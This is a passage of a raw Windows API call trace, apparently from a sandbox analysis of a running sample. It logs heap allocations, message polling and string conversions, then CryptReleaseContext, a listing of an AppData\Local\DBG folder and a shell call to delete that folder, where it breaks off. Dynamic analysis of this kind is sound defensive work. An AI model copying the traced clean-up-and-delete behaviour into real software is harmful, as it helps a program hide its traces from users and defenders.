wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0157.178] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0157.179] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0157.179] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0157.179] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0157.179] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0157.179] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.179] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0157.179] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0157.179] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0157.179] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0157.180] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0157.180] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.180] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0157.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0157.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0157.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0157.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0157.180] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.180] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0157.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0157.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0157.180] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0157.180] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0157.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0157.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0157.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0157.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0157.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0157.180] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0157.180] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0157.180] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0157.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0157.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0157.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0157.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0157.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0157.180] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0157.180] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0157.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0157.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0157.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0157.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0157.222] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0157.222] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0157.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0157.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0157.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0157.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0157.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0157.223] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0157.223] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0157.224] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0157.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0157.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0157.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0157.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0157.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0157.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0157.224] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0157.224] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0157.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0157.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0157.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0157.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0157.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0157.224] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0157.224] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0157.224] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0157.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0157.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0157.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0157.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0157.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0157.224] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0157.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0157.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0157.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0157.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0157.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7020 [0157.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7020, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0157.225] CryptReleaseContext (hProv=0x9bf330, dwFlags=0x0) returned 1 [0157.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0157.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa840 [0157.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0157.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0157.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0157.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0157.225] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.225] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0157.225] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0157.225] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0157.225] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0157.225] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0157.225] FreeLibrary (hLibModule=0x76390000) returned 1 [0157.225] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.225] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.225] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.225] CloseHandle (hObject=0x4b0) returned 1 [0157.226] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.226] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0157.226] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0157.226] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0157.226] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/DBG", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\DBG", lpFilePart=0x8cedf4*="DBG") returned 0x21 [0157.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5da20 | out: hHeap=0x2af0000) returned 1 [0157.226] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\DBG" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\dbg")) returned 0x10 [0157.226] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\DBG\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d2da137, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x2d2da137, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2d2da137, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e1af8 [0157.227] FindNextFileW (in: hFindFile=0x9e1af8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d2da137, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x2d2da137, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2d2da137, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0157.227] FindNextFileW (in: hFindFile=0x9e1af8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d2da137, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x2d2da137, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2d2da137, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 0 [0157.227] FindClose (in: hFindFile=0x9e1af8 | out: hFindFile=0x9e1af8) returned 1 [0157.229] GetLastError () returned 0x12 [0157.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0157.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0157.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0157.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0157.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0157.229] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0157.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0157.229] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0157.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0157.229] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0157.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0157.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0157.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0157.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0157.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0157.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0157.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0157.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0157.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0157.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0157.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0157.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0157.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0157.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0157.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0157.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0157.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0157.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0157.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0157.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0157.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0157.230] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0157.230] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/DBG", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\DBG", lpFilePart=0x8cf650*="DBG") returned 0x21 [0157.231] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d660 | out: hHeap=0x2af0000) returned 1 [0157.231] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\DBG" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\dbg")) returned 0x10 [0157.231] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\DBG", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, 